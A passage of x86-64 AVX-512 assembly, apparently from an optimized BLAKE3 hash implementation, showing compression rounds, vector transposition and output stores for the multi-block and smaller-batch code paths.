vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm28
vpaddd ymm1,ymm1,ymm25
vpaddd ymm2,ymm2,ymm31
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm26
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm23
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm24
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm17
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm29
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm22
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm17
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm31
vpaddd ymm1,ymm1,ymm16
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm30
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm19
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm26
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpxor ymm0,ymm0,ymm8
vpxor ymm1,ymm1,ymm9
vpxor ymm2,ymm2,ymm10
vpxor ymm3,ymm3,ymm11
vpxor ymm4,ymm4,ymm12
vpxor ymm5,ymm5,ymm13
vpxor ymm6,ymm6,ymm14
vpxor ymm7,ymm7,ymm15
vpxord ymm8,ymm8,DWORD PTR [rdi]{1to8}
vpxord ymm9,ymm9,DWORD PTR [rdi+0x4]{1to8}
vpxord ymm10,ymm10,DWORD PTR [rdi+0x8]{1to8}
vpxord ymm11,ymm11,DWORD PTR [rdi+0xc]{1to8}
vpxord ymm12,ymm12,DWORD PTR [rdi+0x10]{1to8}
vpxord ymm13,ymm13,DWORD PTR [rdi+0x14]{1to8}
vpxord ymm14,ymm14,DWORD PTR [rdi+0x18]{1to8}
vpxord ymm15,ymm15,DWORD PTR [rdi+0x1c]{1to8}
vpunpckldq ymm16,ymm0,ymm1
vpunpckhdq ymm17,ymm0,ymm1
vpunpckldq ymm18,ymm2,ymm3
vpunpckhdq ymm19,ymm2,ymm3
vpunpckldq ymm20,ymm4,ymm5
vpunpckhdq ymm21,ymm4,ymm5
vpunpckldq ymm22,ymm6,ymm7
vpunpckhdq ymm23,ymm6,ymm7
vpunpckldq ymm24,ymm8,ymm9
vpunpckhdq ymm25,ymm8,ymm9
vpunpckldq ymm26,ymm10,ymm11
vpunpckhdq ymm27,ymm10,ymm11
vpunpckldq ymm28,ymm12,ymm13
vpunpckhdq ymm29,ymm12,ymm13
vpunpckldq ymm30,ymm14,ymm15
vpunpckhdq ymm31,ymm14,ymm15
vpunpcklqdq ymm0,ymm16,ymm18
vpunpckhqdq ymm1,ymm16,ymm18
vpunpcklqdq ymm2,ymm17,ymm19
vpunpckhqdq ymm3,ymm17,ymm19
vpunpcklqdq ymm4,ymm20,ymm22
vpunpckhqdq ymm5,ymm20,ymm22
vpunpcklqdq ymm6,ymm21,ymm23
vpunpckhqdq ymm7,ymm21,ymm23
vpunpcklqdq ymm8,ymm24,ymm26
vpunpckhqdq ymm9,ymm24,ymm26
vpunpcklqdq ymm10,ymm25,ymm27
vpunpckhqdq ymm11,ymm25,ymm27
vpunpcklqdq ymm12,ymm28,ymm30
vpunpckhqdq ymm13,ymm28,ymm30
vpunpcklqdq ymm14,ymm29,ymm31
vpunpckhqdq ymm15,ymm29,ymm31
vshufi32x4 ymm16,ymm0,ymm4,0x0
vshufi32x4 ymm17,ymm8,ymm12,0x0
vshufi32x4 ymm18,ymm1,ymm5,0x0
vshufi32x4 ymm19,ymm9,ymm13,0x0
vshufi32x4 ymm20,ymm2,ymm6,0x0
vshufi32x4 ymm21,ymm10,ymm14,0x0
vshufi32x4 ymm22,ymm3,ymm7,0x0
vshufi32x4 ymm23,ymm11,ymm15,0x0
vshufi32x4 ymm24,ymm0,ymm4,0x3
vshufi32x4 ymm25,ymm8,ymm12,0x3
vshufi32x4 ymm26,ymm1,ymm5,0x3
vshufi32x4 ymm27,ymm9,ymm13,0x3
vshufi32x4 ymm28,ymm2,ymm6,0x3
vshufi32x4 ymm29,ymm10,ymm14,0x3
vshufi32x4 ymm30,ymm3,ymm7,0x3
vshufi32x4 ymm31,ymm11,ymm15,0x3
vmovdqu32 YMMWORD PTR [r9],ymm16
vmovdqu32 YMMWORD PTR [r9+0x20],ymm17
vmovdqu32 YMMWORD PTR [r9+0x40],ymm18
vmovdqu32 YMMWORD PTR [r9+0x60],ymm19
vmovdqu32 YMMWORD PTR [r9+0x80],ymm20
vmovdqu32 YMMWORD PTR [r9+0xa0],ymm21
vmovdqu32 YMMWORD PTR [r9+0xc0],ymm22
vmovdqu32 YMMWORD PTR [r9+0xe0],ymm23
vmovdqu32 YMMWORD PTR [r9+0x100],ymm24
vmovdqu32 YMMWORD PTR [r9+0x120],ymm25
vmovdqu32 YMMWORD PTR [r9+0x140],ymm26
vmovdqu32 YMMWORD PTR [r9+0x160],ymm27
vmovdqu32 YMMWORD PTR [r9+0x180],ymm28
vmovdqu32 YMMWORD PTR [r9+0x1a0],ymm29
vmovdqu32 YMMWORD PTR [r9+0x1c0],ymm30
vmovdqu32 YMMWORD PTR [r9+0x1e0],ymm31
vmovdqa ymm0,YMMWORD PTR [rsp+0x20]
vmovdqa ymm1,YMMWORD PTR [rsp+0x60]
vmovdqa YMMWORD PTR [rsp],ymm0
vmovdqa YMMWORD PTR [rsp+0x40],ymm1
add r9,0x200
sub r10,0x8
2:
test r10,0x4
je 2f
vbroadcasti32x4 zmm0,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm1,XMMWORD PTR [rdi+0x10]
vbroadcasti32x4 zmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovdqa xmm12,XMMWORD PTR [rsp]
vmovdqa xmm13,XMMWORD PTR [rsp+0x40]
vpunpckldq xmm14,xmm12,xmm13
vpunpckhdq xmm15,xmm12,xmm13
vpermq ymm14,ymm14,0xdc
vpermq ymm15,ymm15,0xdc
vpbroadcastd zmm12,edx
vinserti64x4 zmm13,zmm14,ymm15,0x1
mov eax,0x4444
kmovw k2,eax
vpblendmd zmm13{k2},zmm13,zmm12
vpbroadcastd zmm15,r8d
mov eax,0x8888
kmovw k4,eax
vpblendmd zmm3{k4},zmm13,zmm15
mov eax,0xaaaa
kmovw k3,eax
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x10]
vshufps zmm4,zmm8,zmm9,0x88
vshufps zmm5,zmm8,zmm9,0xdd
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi+0x20]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x30]
vshufps zmm6,zmm8,zmm9,0x88
vshufps zmm7,zmm8,zmm9,0xdd
vpshufd zmm6,zmm6,0x93
vpshufd zmm7,zmm7,0x93
mov al,0x7
3:
vpaddd zmm0,zmm0,zmm4
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm5
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x93
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x39
vpaddd zmm0,zmm0,zmm6
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm7
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x39
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x93
dec al
je 3f
vshufps zmm8,zmm4,zmm5,0xd6
vpshufd zmm9,zmm4,0xf
vpshufd zmm4,zmm8,0x39
vshufps zmm8,zmm6,zmm7,0xfa
vpblendmd zmm9{k3},zmm9,zmm8
vpunpcklqdq zmm8,zmm7,zmm5
vpblendmd zmm8{k4},zmm8,zmm6
vpshufd zmm8,zmm8,0x78
vpunpckhdq zmm5,zmm5,zmm7
vpunpckldq zmm6,zmm6,zmm5
vpshufd zmm7,zmm6,0x1e
vmovdqa32 zmm5,zmm9
vmovdqa32 zmm6,zmm8
jmp 3b
3:
vpxord zmm0,zmm0,zmm2
vpxord zmm1,zmm1,zmm3
vbroadcasti32x4 zmm8,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rdi+0x10]
vpxord zmm2,zmm2,zmm8
vpxord zmm3,zmm3,zmm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vextracti32x4 XMMWORD PTR [r9+0x80],zmm0,0x2
vextracti32x4 XMMWORD PTR [r9+0x90],zmm1,0x2
vextracti32x4 XMMWORD PTR [r9+0xa0],zmm2,0x2
vextracti32x4 XMMWORD PTR [r9+0xb0],zmm3,0x2
vextracti32x4 XMMWORD PTR [r9+0xc0],zmm0,0x3
vextracti32x4 XMMWORD PTR [r9+0xd0],zmm1,0x3
vextracti32x4 XMMWORD PTR [r9+0xe0],zmm2,0x3
vextracti32x4 XMMWORD PTR [r9+0xf0],zmm3,0x3
vmovdqa xmm0,XMMWORD PTR [rsp+0x10]
vmovdqa xmm1,XMMWORD PTR [rsp+0x50]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x100
sub r10,0x4
2:
test r10,0x2
je 2f
vbroadcasti128 ymm0,XMMWORD PTR [rdi]
vbroadcasti128 ymm1,XMMWORD PTR [rdi+0x10]
vmovd xmm13,DWORD PTR [rsp]
vpinsrd xmm13,xmm13,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm13,xmm13,edx,0x2
vmovd xmm14,DWORD PTR [rsp+0x4]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x44],0x1
vpinsrd xmm14,xmm14,edx,0x2
vinserti128 ymm13,ymm13,xmm14,0x1
vbroadcasti128 ymm2,XMMWORD PTR [BLAKE3_IV+rip]
vpbroadcastd ymm8,r8d
vpblendd ymm3,ymm13,ymm8,0x88
vbroadcasti128 ymm8,XMMWORD PTR [rsi]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x10]
vshufps ymm4,ymm8,ymm9,0x88
vshufps ymm5,ymm8,ymm9,0xdd
vbroadcasti128 ymm8,XMMWORD PTR [rsi+0x20]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x30]
vshufps ymm6,ymm8,ymm9,0x88
vshufps ymm7,ymm8,ymm9,0xdd
vpshufd ymm6,ymm6,0x93
vpshufd ymm7,ymm7,0x93
mov al,0x7
3:
vpaddd ymm0,ymm0,ymm4
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm5
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x93
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x39
vpaddd ymm0,ymm0,ymm6
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm7
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x39
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x93
dec al
je 3f
vshufps ymm8,ymm4,ymm5,0xd6
vpshufd ymm9,ymm4,0xf
vpshufd ymm4,ymm8,0x39
vshufps ymm8,ymm6,ymm7,0xfa
vpblendd ymm9,ymm9,ymm8,0xaa
vpunpcklqdq ymm8,ymm7,ymm5
vpblendd ymm8,ymm8,ymm6,0x88
vpshufd ymm8,ymm8,0x78
vpunpckhdq ymm5,ymm5,ymm7
vpunpckldq ymm6,ymm6,ymm5
vpshufd ymm7,ymm6,0x1e
vmovdqa ymm5,ymm9
vmovdqa ymm6,ymm8
jmp 3b
3:
vpxor ymm0,ymm0,ymm2
vpxor ymm1,ymm1,ymm3
vbroadcasti128 ymm8,XMMWORD PTR [rdi]
vbroadcasti128 ymm9,XMMWORD PTR [rdi+0x10]
vpxor ymm2,ymm2,ymm8
vpxor ymm3,ymm3,ymm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
